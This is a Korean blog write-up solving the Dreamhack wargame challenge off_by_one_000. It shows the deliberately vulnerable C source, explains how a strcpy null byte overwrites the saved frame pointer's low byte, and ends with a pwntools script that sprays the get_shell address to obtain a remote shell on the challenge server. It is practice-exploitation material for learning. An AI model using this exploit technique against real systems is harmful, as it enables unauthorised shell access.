https://dreamhack.io/wargame/challenges/9
문제 파일을 다운 받으면 off_by_one_000.c와 실행 파일이 있다.
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>
char cp_name[256];
void get_shell()
{
system("/bin/sh");
}
void alarm_handler()
{
puts("TIME OUT");
exit(-1);
}
void initialize()
{
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler);
alarm(30);
}
int cpy()
{
char real_name[256];
strcpy(real_name, cp_name);
return 0;
}
int main()
{
initialize();
printf("Name: ");
read(0, cp_name, sizeof(cp_name));
cpy();
printf("Name: %s", cp_name);
return 0;
}
1. initialize() 함수 호출 -> 30초 후 실행 종료
2. 전역 변수 cp_name에 read로 입력
3. cpy 함수 호출
4. 지역 변수 real_name에 strcpy로 cp_name 값 복사
5. cp_name 값 출력 -> 실행 종료
디버깅 해 보면 256개의 A를 넣었을 때, SFP의 하위 1바이트가 덮이는 것을 볼 수 있다.
이렇게 SFP의 하위 1바이트가 덮이면 어떻게 될까?
하위 1바이트가 덮인 것과 안 덮인 것이다. 하위 1바이트가 덮이면 변수 한 가운데의 0x41414141을 가리키는 것을 볼 수 있는데, 이를 통해 get_shell 함수를 반복적으로 넣어 256만큼 채워 주면 궁극적으로 get_shell 함수의 주소로 간다는 것을 유추할 수 있다.
get_shell 함수는 4바이트이므로 0x40번 넣어 주면 된다.
이를 코드로 짜면 다음과 같다.
from pwn import *
p = remote("host3.dreamhack.games",15882)
get_shell = p32(0x80485db)
payload = b""
payload += get_shell * 0x40
p.sendafter(b"Name: ", payload)
p.interactive()
'드림핵 워게임' 카테고리의 다른 글
[드림핵/워게임] out_of_bound_000 (0) | 2023.08.17 |
---|---|
[드림핵/워게임] off_by_one_001 (0) | 2023.08.17 |
[드림핵/워게임] sint (0) | 2023.08.10 |
[드림핵/워게임] ssp_001 (0) | 2023.08.10 |
[드림핵/워게임] ssp_000 (0) | 2023.08.10 |